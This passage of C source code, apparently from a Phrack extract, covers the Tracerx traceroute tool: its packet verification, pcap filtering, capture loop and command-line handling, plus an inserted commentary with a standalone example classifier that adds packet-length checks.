* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_struct.h"
#include "./tx_framework.h"
#include "./tx_error.h"
#include "./tx_packet_capture.h"

int
tx_packet_verify_udp(char *packet, struct tx_control **tx_c)
{
    struct libnet_ip_hdr *ip_hdr;
    struct libnet_icmp_hdr *icmp_hdr;
    struct libnet_ip_hdr *o_ip_hdr;

    ip_hdr = (struct libnet_ip_hdr *)(packet + ETH_H);

    /*
     *  A UDP scan is only interested in ICMP packets (or possibly a UDP
     *  packet -- terminal case only).
     */
    if (ip_hdr->ip_p != IPPROTO_ICMP && ip_hdr->ip_p != IPPROTO_UDP)
    {
        return (TX_PACKET_IS_BORING);
    }
    if (ip_hdr->ip_p == IPPROTO_UDP)
    {
        /*
         *  A UDP reply can only be the terminal case (the destination host
         *  answered the probe).  Don't go on and read it as an ICMP header.
         */
        if (ip_hdr->ip_src.s_addr == (*tx_c)->host)
        {
            return (TX_PACKET_IS_TERMINAL);
        }
        return (TX_PACKET_IS_BORING);
    }

    icmp_hdr = (struct libnet_icmp_hdr *)(packet + ETH_H + IP_H);

    /*
     *  Point to the original IP header inside the ICMP message's payload.
     *  Unreachable and time exceeded messages both carry an 8 byte ICMP
     *  header, so the quoted IP header sits at the same offset for both.
     */
    o_ip_hdr = (struct libnet_ip_hdr *)(packet + ETH_H + IP_H +
            ICMP_UNREACH_H);

    switch (icmp_hdr->icmp_type)
    {
        case ICMP_UNREACH:
            if (ip_hdr->ip_src.s_addr == (*tx_c)->host)
            {
                /*
                 *  This is an unreachable packet from our destination host.
                 *  This has to be the terminal packet.  The report module
                 *  will need to know if it's a regular port unreachable
                 *  message or perhaps some other type of unreachable..
                 */
                if (icmp_hdr->icmp_code == ICMP_UNREACH_PORT)
                {
                    return (TX_PACKET_IS_TERMINAL);
                }
                else
                {
                    return (TX_PACKET_IS_TERMINAL_EXOTIC);
                }
            }
            if (ntohs(o_ip_hdr->ip_id) == (*tx_c)->id &&
                    o_ip_hdr->ip_src.s_addr == (*tx_c)->sin.sin_addr.s_addr)
            {
                /*
                 *  The original IP header was sent by this host and contains
                 *  our special ID field, so it's almost positively ours.
                 */
                return (TX_PACKET_IS_UNREACH_EN_ROUTE);
            }
            return (TX_PACKET_IS_BORING);
        case ICMP_TIMXCEED:
            /*
             *  The TTL ran out at an intermediate hop.  Same ownership
             *  check on the quoted IP header as above.
             */
            if (ntohs(o_ip_hdr->ip_id) == (*tx_c)->id &&
                    o_ip_hdr->ip_src.s_addr == (*tx_c)->sin.sin_addr.s_addr)
            {
                return (TX_PACKET_IS_EXPIRED);
            }
            return (TX_PACKET_IS_BORING);
        default:
            return (TX_PACKET_IS_BORING);
    }
}

int
tx_packet_verify_tcp(char *packet, struct tx_control **tx_c)
{
    /* WRITEME */
    return (TX_PACKET_IS_BORING);
}

int
tx_packet_verify_icmp(char *packet, struct tx_control **tx_c)
{
    /* WRITEME */
    return (TX_PACKET_IS_BORING);
}

/* EOF */
<-->
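tx_packet_verify_udp above reads the IP and ICMP headers at fixed offsets (ETH_H + IP_H, plus ICMP_UNREACH_H for the quoted header) and never looks at how many bytes pcap actually handed it, nor at the IP header length field. As an added example, not Tracerx code, here is a self-contained classifier in the same spirit with the captured-length and IHL checks a verifier should have, run over constructed Ethernet/IPv4/ICMP frames with TEST-NET addresses. The PKT_* classes mirror the page's TX_PACKET_IS_* names (their numeric values are assumed), probe_ctx stands in for the three tx_control fields the check needs, and classify, make_icmp_error and classify_demo are this example's own. It also requires the quoted header to be ours before accepting an unreachable from the destination host, which the original does not.

```c
/* Added example (not Tracerx code): classify a captured frame the way
 * tx_packet_verify_udp intends to, with length/IHL checks added.  Every
 * packet is constructed in memory; addresses are from the TEST-NET ranges. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ETH_LEN      14
#define IP_MINLEN    20
#define ICMP_ERR_LEN 8      /* unreach / time exceeded: type, code, sum, unused */

/* Same classes as the page's TX_PACKET_IS_* values; the numbers are assumed. */
enum probe_class { PKT_BORING = 0, PKT_EXPIRED, PKT_TERMINAL,
                   PKT_TERMINAL_EXOTIC, PKT_UNREACH_EN_ROUTE };

/* The part of tx_control the verifier needs (addresses as raw wire bytes). */
struct probe_ctx { uint16_t ip_id; uint32_t our_src; uint32_t target; };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
/* Four wire bytes as an opaque value, only ever compared with values built
 * the same way, so host byte order never matters. */
static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint32_t ip4(int a, int b, int c, int d)
{ uint8_t o[4]; o[0] = a; o[1] = b; o[2] = c; o[3] = d; return rd32(o); }

static enum probe_class classify(const uint8_t *pkt, size_t caplen,
                                 const struct probe_ctx *ctx)
{
    const uint8_t *ip, *icmp, *inner;
    size_t ihl;

    if (caplen < ETH_LEN + IP_MINLEN) return PKT_BORING;     /* truncated */
    ip = pkt + ETH_LEN;
    ihl = (size_t)(ip[0] & 0x0f) * 4;
    if ((ip[0] >> 4) != 4 || ihl < IP_MINLEN || caplen < ETH_LEN + ihl)
        return PKT_BORING;

    if (ip[9] == 17)        /* UDP: only the destination itself answers */
        return rd32(ip + 12) == ctx->target ? PKT_TERMINAL : PKT_BORING;
    if (ip[9] != 1)         /* not ICMP either */
        return PKT_BORING;

    /* An ICMP error needs its 8 byte header plus the quoted IP header. */
    if (caplen < ETH_LEN + ihl + ICMP_ERR_LEN + IP_MINLEN) return PKT_BORING;
    icmp = ip + ihl;
    inner = icmp + ICMP_ERR_LEN;

    /* Ownership: the quoted packet must carry our id and our source. */
    if ((inner[0] >> 4) != 4 || rd16(inner + 4) != ctx->ip_id ||
        rd32(inner + 12) != ctx->our_src)
        return PKT_BORING;

    switch (icmp[0])
    {
    case 11:                /* time exceeded: a hop en route */
        return PKT_EXPIRED;
    case 3:                 /* destination unreachable */
        if (rd32(ip + 12) == ctx->target)   /* from the target: terminal */
            return icmp[1] == 3 ? PKT_TERMINAL : PKT_TERMINAL_EXOTIC;
        return PKT_UNREACH_EN_ROUTE;        /* a router in between refused */
    default:
        return PKT_BORING;
    }
}

/* Constructed Ethernet/IP/ICMP error frame quoting an IP header (+ 8 bytes
 * of UDP) with the given id/source/destination.  Checksums stay zero; they
 * are not what is being demonstrated. */
static size_t make_icmp_error(uint8_t *buf, uint8_t type, uint8_t code,
                              uint32_t src, uint32_t dst, uint16_t inner_id,
                              uint32_t inner_src, uint32_t inner_dst)
{
    size_t n = ETH_LEN;

    memset(buf, 0, ETH_LEN + IP_MINLEN + ICMP_ERR_LEN + IP_MINLEN + 8);
    buf[12] = 0x08;                         /* ethertype 0x0800 */
    buf[n] = 0x45; buf[n + 9] = 1;          /* IPv4, IHL 5, protocol ICMP */
    memcpy(buf + n + 12, &src, 4); memcpy(buf + n + 16, &dst, 4);
    n += IP_MINLEN;
    buf[n] = type; buf[n + 1] = code;
    n += ICMP_ERR_LEN;
    buf[n] = 0x45; buf[n + 9] = 17;         /* quoted header: IPv4, UDP */
    buf[n + 4] = (uint8_t)(inner_id >> 8); buf[n + 5] = (uint8_t)inner_id;
    memcpy(buf + n + 12, &inner_src, 4); memcpy(buf + n + 16, &inner_dst, 4);
    return n + IP_MINLEN + 8;
}

/* Runs one frame of every class through classify; 1 when all agree. */
static int classify_demo(void)
{
    struct probe_ctx ctx;
    uint32_t router = ip4(203, 0, 113, 1);
    uint8_t buf[128];
    size_t n;
    int ok = 1;

    ctx.ip_id = 0x4242; ctx.our_src = ip4(192, 0, 2, 1); ctx.target = ip4(198, 51, 100, 9);
    n = make_icmp_error(buf, 11, 0, router, ctx.our_src, 0x4242, ctx.our_src, ctx.target);
    ok &= classify(buf, n, &ctx) == PKT_EXPIRED;
    n = make_icmp_error(buf, 3, 3, ctx.target, ctx.our_src, 0x4242, ctx.our_src, ctx.target);
    ok &= classify(buf, n, &ctx) == PKT_TERMINAL;
    n = make_icmp_error(buf, 3, 1, ctx.target, ctx.our_src, 0x4242, ctx.our_src, ctx.target);
    ok &= classify(buf, n, &ctx) == PKT_TERMINAL_EXOTIC;
    n = make_icmp_error(buf, 3, 13, router, ctx.our_src, 0x4242, ctx.our_src, ctx.target);
    ok &= classify(buf, n, &ctx) == PKT_UNREACH_EN_ROUTE;
    /* someone else's probe quoted (id differs), then a short capture that
     * the original's fixed-offset casts would read straight past */
    n = make_icmp_error(buf, 11, 0, router, ctx.our_src, 0x1111, ctx.our_src, ctx.target);
    ok &= classify(buf, n, &ctx) == PKT_BORING;
    ok &= classify(buf, ETH_LEN + IP_MINLEN + 4, &ctx) == PKT_BORING;
    return ok;
}

int main(void)
{
    printf("classifier demo: %s\n", classify_demo() ? "ok" : "FAILED");
    return 0;
}
```

The id plus source address check is the whole basis of Tracerx's matching (the payload seq field is noted as deprecated for that reason), so anything that reaches the report stage without passing it is a false reading; the length check matters just as much, because a capture snap length or a truncated error quote can leave fewer bytes than the casts assume.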
<++> P55/Tracerx/tx_packet_filter.c !df1a0488
/*
* $Id: tx_packet_filter.c,v 1.1 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tx_packet_filter.c - packet filtering routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_struct.h"
#include "./tx_error.h"
#include "./tx_main.h"
#include "./tx_packet_filter.h"

int
tx_set_pcap_filter(char *filter, struct tx_control **tx_c)
{
    struct bpf_program filter_code;
    bpf_u_int32 local_net, netmask;
    char err_buf[BUFSIZ];

    /*
     *  We need the subnet mask to apply a filter.
     */
    if (pcap_lookupnet((*tx_c)->device, &local_net, &netmask, err_buf) == -1)
    {
        tx_error(CRITICAL, "pcap_lookupnet: %s\n", err_buf);
        return (-1);
    }

    /*
     *  Compile the filter into bpf machine code.
     */
    if (pcap_compile((*tx_c)->p, &filter_code, filter, 1, netmask) == -1)
    {
        tx_error(CRITICAL, "pcap_compile: %s\n", pcap_geterr((*tx_c)->p));
        return (-1);
    }

    /*
     *  Install the compiled filter on the capture descriptor.
     */
    if (pcap_setfilter((*tx_c)->p, &filter_code) == -1)
    {
        tx_error(CRITICAL, "pcap_setfilter: %s\n", pcap_geterr((*tx_c)->p));
        return (-1);
    }
    return (1);
}

/* EOF */
<-->
<++> P55/Tracerx/tx_packet_capture.c !27092cf6
/*
* $Id: tx_packet_capture.c,v 1.2 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tx_packet_capture.c - high-level packet capturing routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_struct.h"
#include "./tx_framework.h"
#include "./tx_error.h"
#include "./tx_packet_capture.h"

int
tx_packet_snatcher(struct tx_control **tx_c)
{
    int n;
    u_char *packet;
    struct pcap_pkthdr pc_hdr;

    /*
     *  Temporary looping construct until parallel code is in place.
     */
    while ((packet = (u_char *)pcap_next((*tx_c)->p, &pc_hdr)) != NULL)
    {
        /*
         *  Submit packet for verification based on scan type.
         */
        switch ((*tx_c)->protocol)
        {
            case IPPROTO_UDP:
                n = tx_packet_verify_udp((char *)packet, tx_c);
                break;
            case IPPROTO_TCP:
                n = tx_packet_verify_tcp((char *)packet, tx_c);
                break;
            case IPPROTO_ICMP:
                n = tx_packet_verify_icmp((char *)packet, tx_c);
                break;
            default:
                /* unknown scan type, nothing to verify against */
                n = -1;
                break;
        }

        /*
         *  Process the response from the verifier.
         */
        switch (n)
        {
            case -1:
                /* an error occurred */
            case TX_PACKET_IS_BORING:
                /* not something we are interested in */
                break;
            case TX_PACKET_IS_EXPIRED:
                tx_report(TX_PACKET_IS_EXPIRED, packet, tx_c);
                break;
            case TX_PACKET_IS_TERMINAL:
                tx_report(TX_PACKET_IS_TERMINAL, packet, tx_c);
                break;
            case TX_PACKET_IS_TERMINAL_EXOTIC:
                tx_report(TX_PACKET_IS_TERMINAL_EXOTIC, packet, tx_c);
                break;
            case TX_PACKET_IS_UNREACH_EN_ROUTE:
                tx_report(TX_PACKET_IS_UNREACH_EN_ROUTE, packet, tx_c);
                break;
            default:
                break;
        }
    }
    return (1);
}

/* EOF */
<-->
<++> P55/Tracerx/tx_main.c !831e8153
/*
* $Id: tx_main.c,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tx_main.c - main control logic
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_main.h"
#include "./tx_util.h"
#include "./version.h"
#include "./tx_struct.h"
#include "./tx_error.h"
#include "./tx_framework.h"

int
main(int argc, char *argv[])
{
    int c,
        have_protocol;              /* Mediates combined usage of -I and -P */
    char err_buf[BUFSIZ];
    struct tx_control *tx_c;

    /*
     *  Need to be root to open link layer devices.
     */
    if (geteuid() && getuid())
    {
        tx_error(FATAL, "Pony up the privledgez (UID or EUID == 0).\n");
    }

    /*
     *  Initialize control structure.  This structure is used by just about
     *  every function in the program.
     */
    if (tx_init_control(&tx_c) == -1)
    {
        tx_error(FATAL, "tx_init_control %s\n", strerror(errno));
    }

    /*
     *  Process commandline arguments.  Every option that takes a value
     *  needs its trailing ':' here, or getopt never hands it an argument.
     */
    have_protocol = 0;
    while ((c = getopt(argc, argv, "b:D:dFf:g:HhIi:m:nP:p:q:rSs:t:Vvw:x"))
            != EOF)
    {
        switch (c)
        {
            case 'b':
                /* Select burst rate */
                tx_c->burst_rate = tx_str2int(optarg, "burst rate", 1,
                        BURST_RATE_MAX);
                break;
            case 'D':
                /* Set base TCP/UDP destination port number */
                tx_c->initial_dport = tx_str2int(optarg, "initial dest port",
                        1, PORT_MAX);
                break;
            case 'd':
                /* Socket level debugging (SO_DEBUG) */
                /* NOOP */
                break;
            case 'F':
                /* Set IP_DF (don't fragment) bit */
                tx_c->ip_df = IP_DF;
                break;
            case 'f':
                /* Set initial (first) IP TTL */
                tx_c->current_ttl = tx_str2int(optarg, "initial TTL", 1,
                        IP_TTL_MAX);
                break;
            case 'g':
                /* Loose source routing */
                /* NOOP */
                break;
            case 'H':
                /* Verbose help */
                /* WRITEME */
                /* FALLTHROUGH */
            case 'h':
                /* Help */
                usage(argv[0]);
            case 'I':
                /* Use ICMP */
                /* Set transport protocol and transport header size */
                /* Overruled by -P */
                if (!have_protocol)
                {
                    tx_c->protocol = tx_prot_select("ICMP", &tx_c);
                }
                break;
            case 'i':
                /* Interface */
                tx_c->device = optarg;
                break;
            case 'm':
                /* Max IP TTL */
                tx_c->max_ttl = tx_str2int(optarg, "max TTL", 1,
                        IP_TTL_MAX);
                break;
            case 'n':
                /* Do not resolve hostnames */
                tx_c->use_name = 0;
                break;
            case 'P':
                /* Set transport protocol and transport header size */
                /* (supersedes -I) */
                tx_c->protocol = tx_prot_select(optarg, &tx_c);
                have_protocol = 1;
                break;
            case 'p':
                /* Set base TCP/UDP destination port number */
                tx_c->initial_dport = tx_str2int(optarg, "initial dest port",
                        1, PORT_MAX);
                break;
            case 'q':
                /* Number of probes (queries) */
                tx_c->probe_cnt = tx_str2int(optarg, "probe cnt", 1,
                        PROBE_MAX);
                break;
            case 'r':
                /* Bypass routing sockets */
                /* NOOP */
                break;
            case 'S':
                /* Do not increment TCP/UDP port numbers (static) */
                tx_c->tx_flags |= TX_STATIC_PORTS;
                break;
            case 's':
                /* Set base TCP/UDP source port number */
                tx_c->initial_sport = tx_str2int(optarg, "initial source port",
                        1, PORT_MAX);
                break;
            case 't':
                /* Set IP_TOS (type of service) bits */
                tx_c->ip_tos = tx_str2int(optarg, "IP tos", 0, 255);
                break;
            case 'V':
                /* Version information */
                fprintf(stderr, "\n%s\nversion %s\n", BANNER, version);
                exit(EXIT_SUCCESS);
            case 'v':
                /* Verbose output */
                tx_c->verbose = 1;
                break;
            case 'x':
                /* Toggle checksums */
                /* NOOP */
                break;
            case 'w':
                /* Time to wait (in seconds) */
                tx_c->reading_wait = tx_str2int(optarg, "read wait", 2,
                        WAIT_MAX);
                break;
            default:
                usage(argv[0]);
        }
    }

    /*
     *  Parse the command line for the destination host and possible
     *  packetlength.
     */
    switch (argc - optind)
    {
        case 2:
            /*
             *  User specified packetlength (optional).  This will later
             *  be verified and adjusted if necessary.
             */
            tx_c->packet_size = tx_str2int(argv[optind + 1], "packet length",
                    PACKET_MIN, PACKET_MAX);
            /* FALLTHROUGH */
        case 1:
            /* Host (required). */
            tx_c->host = libnet_name_resolve(argv[optind], 1);
            if (tx_c->host == -1)
            {
                tx_error(FATAL, "Cannot resolve host IP address\n");
            }
            break;
        default:
            usage(argv[0]);
    }

    /*
     *  Bring up the network components.
     */
    if (tx_init_network(&tx_c, err_buf) == -1)
    {
        tx_error(FATAL, "Cannot initialize the network: %s\n", err_buf);
    }

    /*
     *  Start the game!
     */
    tx_do_scan(&tx_c);

    /*
     *  Stop the game!
     */
    tx_shutdown(&tx_c);
    return (EXIT_SUCCESS);
}

void
usage(char *argv0)
{
    fprintf(stderr,
        "\nUsage : %s [options] host [packetlength]\n"
        "\t\t [-b] burst rate\n"
        "\t\t [-F] IP_DF\n"
        "\t\t [-f] base IP TTL\n"
        "\t\t [-g] loose source routing\n"
        "\t\t [-H] verbose help\n"
        "\t\t [-h] help\n"
        "\t\t [-I] use ICMP\n"
        "\t\t [-i] specify interface\n"
        "\t\t [-m] max IP TTL (hopcount)\n"
        "\t\t [-n] do not resolve IP addresses into hostnames\n"
        "\t\t [-P] transport protocol (supersedes -I)\n"
        "\t\t [-p] base TCP/UDP port number (destination)\n"
        "\t\t [-q] number of probes\n"
        "\t\t [-S] do not increment TCP/UDP port numbers (static)\n"
        "\t\t [-s] base TCP/UDP port number (source)\n"
        "\t\t [-t] IP TOS\n"
        "\t\t [-V] version information\n"
        "\t\t [-v] verbose output\n"
        "\t\t [-w] wait (in seconds)\n"
        "\n", argv0);
    exit(EXIT_FAILURE);
}

/* EOF */
<-->
<++> P55/Tracerx/tx_report.c !04c69fdd
/*
* $Id: tx_report.c,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
*
* Tracerx
* tx_report.c - reporting and printing module
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_struct.h"
#include "./tx_packet_capture.h"

void
tx_report(int class, u_char *packet, struct tx_control **tx_c)
{
    switch (class)
    {
        case TX_PACKET_IS_EXPIRED:
            break;
        case TX_PACKET_IS_TERMINAL:
            break;
        case TX_PACKET_IS_UNREACH_EN_ROUTE:
            break;
        default:
            break;
    }
}

/* EOF */
<-->
<++> P55/Tracerx/tx_util.c !29dd0492
/*
* $Id: tx_util.c,v 1.2 1999/05/29 20:28:43 route Exp $
*
* Tracerx
* tx_util.c - various routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_main.h"
#include "./tx_struct.h"
#include "./tx_util.h"
#include "./tx_error.h"

int
tx_str2int(register const char *str, register const char *what,
        register int min, register int max)
{
    register const char *cp;
    register int val;
    char *ep;

    if (str[0] == '0' && (str[1] == 'x' || str[1] == 'X'))
    {
        cp = str + 2;
        val = (int)strtol(cp, &ep, 16);
    }
    else
    {
        cp = str;
        val = (int)strtol(cp, &ep, 10);
    }
    /*
     *  Reject trailing junk and the empty string (strtol would quietly
     *  return 0 for the latter).
     */
    if (ep == cp || *ep != '\0')
    {
        tx_error(FATAL, "\"%s\" bad value for %s \n", str, what);
    }
    if (val < min && min >= 0)
    {
        if (min == 0)
        {
            tx_error(FATAL, "%s must be >= %d\n", what, min);
        }
        else
        {
            tx_error(FATAL, "%s must be > %d\n", what, min - 1);
        }
    }
    if (val > max && max >= 0)
    {
        tx_error(FATAL, "%s must be <= %d\n", what, max);
    }
    return (val);
}

int
tx_prot_select(char *protocol, struct tx_control **tx_c)
{
    char *supp_protocols[] = {"UDP", "TCP", "ICMP", 0};
    int i;

    for (i = 0; supp_protocols[i]; i++)
    {
        if ((!strcasecmp(supp_protocols[i], protocol)))
        {
            switch (i)
            {
                case 0:
                    /* UDP */
                    (*tx_c)->packet_size = IP_H + UDP_H + TX_P;
                    return (IPPROTO_UDP);
                case 1:
                    /* TCP */
                    (*tx_c)->packet_size = IP_H + TCP_H + TX_P;
                    return (IPPROTO_TCP);
                case 2:
                    /* ICMP */
                    (*tx_c)->packet_size = IP_H + ICMP_ECHO_H + TX_P;
                    return (IPPROTO_ICMP);
                default:
                    tx_error(FATAL, "Unknown protocol: %s\n", protocol);
            }
        }
    }
    tx_error(FATAL, "Unknown protocol: %s\n", protocol);
    /* UNREACHED (silences compiler warnings) */
    return (-1);
}

int
tx_get_hwaddrs(struct ether_addr **l, struct ether_addr **r,
        struct tx_control **tx_c, u_char *errbuf)
{
    *l = get_hwaddr((*tx_c)->l, (*tx_c)->device, errbuf);
    if (*l == NULL)
    {
        return (-1);
    }
    /*
     *  Remote (first hop router) address lookup isn't written yet;
     *  tx_packet_build_probe uses its DEBUG_ETHER address in the meantime.
     */
    *r = NULL;
    return (1);
}

/* EOF */
<-->
<++> P55/Tracerx/tx_error.c !1962d944
/*
* $Id: tx_error.c,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
*
* Tracerx
* tx_error.c - error handling routines
*
